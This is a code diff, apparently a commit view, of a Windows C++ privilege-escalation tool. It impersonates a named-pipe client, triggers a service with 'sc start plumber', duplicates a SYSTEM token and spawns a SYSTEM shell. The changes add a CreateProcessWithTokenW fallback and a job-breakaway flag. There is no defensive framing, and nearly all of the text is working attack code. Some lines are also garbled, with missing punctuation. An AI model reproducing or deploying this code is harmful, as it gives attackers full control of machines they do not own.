@@ -58,9 +58,9 @@ void NamedPipeImpersonate()
5858 DWORD messageLenght = lstrlen (message) * 2 ;
5959 DWORD bytesWritten = 0 ;
6060
61- std::wcout << " Creating named pipe "
61+ std::wcout << " Creating named pipe and sleeping for 3 seconds "
6262 serverPipe = CreateNamedPipe (pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1 , 2048 , 2048 , 0 , NULL );
63-
63+ Sleep ( 3000 );
6464 WinExec (" cmd.exe /c sc start plumber" 0 );
6565 /* [Deprecated]
6666 if (HINSTANCE retVal2 = ShellExecuteW(NULL, L"open", L"cmd.exe", L"/k sc start plumber", NULL, SW_HIDE))
@@ -114,10 +114,10 @@ void NamedPipeImpersonate()
114114 wprintf (L" DuplicateTokenEx() failed. Error: %d\n " GetLastError ());
115115 goto cleanup;
116116 }
117+
117118
118-
119- dwCreationFlags = CREATE_UNICODE_ENVIRONMENT;
120-
119+ dwCreationFlags = CREATE_UNICODE_ENVIRONMENT | CREATE_BREAKAWAY_FROM_JOB;
120+ BOOL bRet;
121121
122122 if (!(pwszCurrentDirectory = (LPWSTR)malloc (MAX_PATH * sizeof (WCHAR))))
123123 goto cleanup;
@@ -137,17 +137,35 @@ void NamedPipeImpersonate()
137137 ZeroMemory (&si, sizeof (STARTUPINFO));
138138 si.cb = sizeof (STARTUPINFO);
139139 si.lpDesktop = const_cast <wchar_t *>(L" WinSta0\\ Default"
140-
140+
141141 if (CreateProcessAsUser (hSystemTokenDup, NULL , command, NULL , NULL , TRUE , dwCreationFlags, lpEnvironment, pwszCurrentDirectory, &si, &pi))
142142 {
143143 printf (" [+] successfully created a SYSTEM shell!!!\n "
144+ fflush (stdout);
145+ WaitForSingleObject (pi.hProcess , INFINITE);
146+ }
147+ else
148+ {
149+ printf (" [!] There was an error creating the SYSTEM shell using CreateProcessAsUser: %d\n Trying another method..." GetLastError ());
150+ fflush (stdout);
151+ WaitForSingleObject (pi.hProcess , INFINITE);
152+ }
153+ bRet = CreateProcessWithTokenW (hSystemTokenDup, NULL , NULL , command, dwCreationFlags, lpEnvironment, pwszCurrentDirectory, &si, &pi);
154+
155+ if (bRet == 0 )
156+ {
157+ printf (" [!] CreateProcessWithToken didn't cooperate...permissions maybe???\n "
158+ printf (" Return value: %d\n " GetLastError ());
159+ fflush (stdout);
160+ WaitForSingleObject (pi.hProcess , INFINITE);
144161 }
145162 else
146163 {
147- printf (" [!] There was an error creating the SYSTEM shell using CreateProcessAsUser: %d\n " GetLastError ());
164+ printf (" [+] CreateProcessWithToken worked!!!\n "
165+ printf (" Return value: %d\n "
166+ fflush (stdout);
167+ WaitForSingleObject (pi.hProcess , INFINITE);
148168 }
149- fflush (stdout);
150- WaitForSingleObject (pi.hProcess , INFINITE);
151169cleanup:
152170 if (hSystemToken)
153171 CloseHandle (hSystemToken);
@@ -358,8 +376,7 @@ int LowerProcessIntegrity(DWORD pid, int integritylevel)
358376 if (SetTokenInformation (hNewToken, TokenIntegrityLevel, &TIL,
359377 sizeof (TOKEN_MANDATORY_LABEL) + GetLengthSid (pIntegritySid)))
360378 {
361- dwCreationFlags = CREATE_UNICODE_ENVIRONMENT;
362-
379+ dwCreationFlags = CREATE_UNICODE_ENVIRONMENT | CREATE_BREAKAWAY_FROM_JOB;
363380
364381 if (!(pwszCurrentDirectory = (LPWSTR)malloc (MAX_PATH * sizeof (WCHAR))))
365382 {
@@ -481,14 +498,15 @@ int DupThreadToken(DWORD pid)
481498 {
482499 wprintf (L" [!] OpenThreadToken(). Error: %d\n " GetLastError ());
483500 }
484-
501+
485502 if (!DuplicateTokenEx (hSystemToken, TOKEN_ALL_ACCESS, NULL , SecurityImpersonation, TokenPrimary, &hSystemTokenDup))
486503 {
487504 wprintf (L" [!] DuplicateTokenEx() failed. Error: %d\n " GetLastError ());
488505 }
506+
507+
489508
490-
491- dwCreationFlags = CREATE_UNICODE_ENVIRONMENT;
509+ dwCreationFlags = CREATE_UNICODE_ENVIRONMENT | CREATE_BREAKAWAY_FROM_JOB;
492510
493511 if (!(pwszCurrentDirectory = (LPWSTR)malloc (MAX_PATH * sizeof (WCHAR))))
494512 {
@@ -630,7 +648,7 @@ int DupProcessToken(DWORD pid)
630648 {
631649 printf (" [+] DuplicateTokenEx success!!!\n "
632650 }
633- dwCreationFlags = CREATE_UNICODE_ENVIRONMENT;
651+ dwCreationFlags = CREATE_UNICODE_ENVIRONMENT | CREATE_BREAKAWAY_FROM_JOB ;
634652
635653
636654 if (!(pwszCurrentDirectory = (LPWSTR)malloc (MAX_PATH * sizeof (WCHAR))))
0 commit comments